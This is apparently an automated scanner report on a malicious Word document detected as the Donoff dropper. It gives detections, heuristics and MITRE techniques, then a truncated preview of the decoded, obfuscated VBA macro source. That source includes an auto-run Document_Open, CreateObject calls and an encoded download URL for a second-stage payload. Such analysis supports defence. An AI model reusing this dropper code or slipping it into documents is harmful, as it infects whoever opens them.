MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, and triggers heuristics related to CreateObject and CallByName, indicating malicious code execution. ClamAV detection as 'Doc.Dropper.Donoff-5743527-0' strongly suggests this is a dropper for the Donoff family. The VBA code, though obfuscated, appears designed to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17405 bytes |
SHA-256: 14bac9686e0b99bc8f67c412f84ecbfb273b6e6fbbb63d22e4e4916e4e70fb69 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ifQyqEqqDblDm(ByVal ZSQboaEkRIILQY As Integer) As String
JMQVpHmPk
loGAMtaHqQcvO 8198
If UWdiRl(8828, "vGyt") Then
jdqBvVjuiEuc
SjVAhISClD = 7276
SVymwhP 4905, ""
LewJnr
End If
SCgkFw = "4XhF"
ifQyqEqqDblDm = "JzyA"
End Function
Private Function biagNyvS() As Integer
VVLYA False
xrbvGxleYvcz 2233, "ppo"
acCCTuY
biagNyvS = 5204
End Function
Private Function rKCmnHimc() As String
If mnPPBLBkyuBEhM(9126) Then
UrtVlWavVO = 8634
GxjrAbSYzQSe
Else
RbOSWrcu True
OsADZMpKZzqv
adRqK
End If
onsqQYqtupKk = True
rKCmnHimc = "JcNpG"
End Function
Private Sub Document_Open()
UznIuUa.uCjoqU
End Sub
Private Function FlLwYm(ByVal Fcgzrb As String, ByVal OSrDQahyT As Integer) As Integer
TubKF 4374
llHsMi
FifoRtqC
If rYnfKvVbfdemW Then
akuUZZ
Else
gkimsowgZrJrM = "bZI"
bhJOHqSrBUvJL
BPiFeHWKwdE
End If
FlLwYm = 1337
End Function
Attribute VB_Name = "UznIuUa"
Private Function eHYfHP(ByVal CqJEWQ As Object, ByVal TwpfbFiqpKuMV As Boolean) As Object
Dim ncNYaoEuhmLkk As Integer
ZhasZeBqVjjoYo = False
Set eHYfHP = CqJEWQ
End Function
Public Sub uCjoqU()
On Error GoTo HHQHWx
aATetMR.hyosUqZ
soeWh = True
aATetMR.rYFLHQNkz
nwBIvl
Exit Sub
jkEkVjS = 5724
HHQHWx:
End Sub
Private Sub nwBIvl()
Dim OKsxmnsBid As String
Dim hSBRDrMA As Integer
PKYsuPdCLwre = ""
PJYIE 5737, YFOyyknzud.ewPkGfYACz, tqQmc
LSLtRpI = 6867
YFOyyknzud.VWCXhzkYCqX 6258, YFOyyknzud.ewPkGfYACz
End Sub
Public Function JTQin(ByVal qmNCbtemadOI As String) As Object
Dim tpEtMKrYQ As String
Dim UpcNKbeVnkTnk As Boolean
hXxGqkWh = "Eqrvz"
Set JTQin = eHYfHP(CreateObject(qmNCbtemadOI), True)
End Function
Private Function hvicUHmiexgCz(ByVal rJYPwsEUNWue As String) As Integer
If LTGzsDA(8404, "4Nw") Then
ylizpRfAtMIEdI = 7354
ojvmOdAUfxOpvP
SwQzaHA
jwTyuAkJpEOlL
bvtaRvXcBnuYs = "aQ"
Else
DAttwmJdBg
VbNrcXe "bKvuO", 4897
CfaFCV
End If
sXpmsIwCnBMVcl 4147, 3708, 9625
hvicUHmiexgCz = 2465
End Function
Private Sub PJYIE(ByVal BTECcx As Integer, ByVal fijOmBBXClSJ As String, ByVal sZieeU As String)
Dim imtqNWaAU As Integer
Set THTxvExUwwgpp = ojDLpfoamw.nBlvUb(sZieeU, 7913, True)
ojDLpfoamw.weTrVaHMDnwoBT "", csHhyD, 3895, THTxvExUwwgpp
ohbUVEThfDLTt = True
YFOyyknzud.NoBhwAKyFjpa 6655, IvRPLtYFWQ.UFgbWSdd(2621, THTxvExUwwgpp, "w5I", JgNKoM.HqxvxARBgU("R3eUgs/po3n3UsCeUBgodgyc", "rUg9cC/3")), "", fijOmBBXClSJ
End Sub
Private Function tqQmc() As String
tqQmc = JgNKoM.HqxvxARBgU("RhtXt5Gp:MM//GjncjRb5-jtrveGMnMdMsv.cGoMm5X/cRMatRXalvovgXv/oRf5fjGicvXeX1v2.RvdvaXt", "RvX5GjM")
End Function
Private Function csHhyD() As String
csHhyD = JgNKoM.HqxvxARBgU("TCTanTh'tSG d:ojwGunl8uoa:8d: bhi18nSar1y1L f:SiLlLe", "L8G:TjS1uh")
End Function
Attribute VB_Name = "JgNKoM"
Private Sub merSuu()
LvAdtjZofS False, 4187, False
EqPaBFHEhkEBj 3928, True, 3091
End Sub
Public Function gCLyYkPKvyx(ByVal kCcFfRlwjVN As String, ByVal BOMzkTEJiyvD As Boolean, ByVal vyMOdJr As String) As String
Dim hhyIwaoaIxyQ As Boolean
Dim PxuoHiev As Integer
DEXeVCNkOn = "tyyB"
gCLyYkPKvyx = kCcFfRlwjVN & vyMOdJr
End Function
Private Sub HZbUaXFnFLSbD()
jxXJYzl 3835, "", 8764
alLBqqzcRh 5484, 760, 7177
kBVgu = 3182
XaLLkuomjFpm
End Sub
Private Function lvZoEkOEiOOOFQ(ByVal fMoeiwLT As String, ByVal lRRIeLTfKX As String) As String
If Not PyjxsbeBtcX.nDaRCfpyGqRe("7bSB", lRRIeLTfKX, fMoeiwLT, "SEo") Then
lvZoEkOEiOOOFQ = lRRIeLTfKX
End If
End Function
Private Function VpICRpgOLpxt() As Integer
txJQf = ""
VpICRpgOLpxt = 1
End Function
Public Function HqxvxARBgU(ByVal ehrRfcjDg As String, ByVal xADwMEqNENb As String) As String
Dim lGjdVGh As String
Dim GUQWqYftlrTi As String
Dim okvwVzope As Integer
For PwCPI = VpICRpgOLpxt To PyjxsbeBtcX.GQIxrG(ehrRfcjDg)
lGjdVGh = lvZoEkOEiOOOFQ(xADwMEqNENb, PyjxsbeBtcX.Hu
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.